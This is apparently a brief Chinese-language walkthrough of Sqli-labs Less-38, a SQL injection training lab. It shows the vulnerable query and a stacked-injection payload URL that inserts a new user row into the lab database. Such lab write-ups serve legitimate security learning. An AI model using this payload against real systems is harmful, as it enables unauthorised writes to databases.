Sqli-labs less 38

Less-38

学习了关于stacked injection的相关知识，我们在本关可以得到直接的运用。

在执行select时的sql语句为：SELECT * FROM users WHERE id='$id' LIMIT 0,1

可以直接构造如下的payload：

http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+

再看数据表中的内容：可以看到less38已经添加。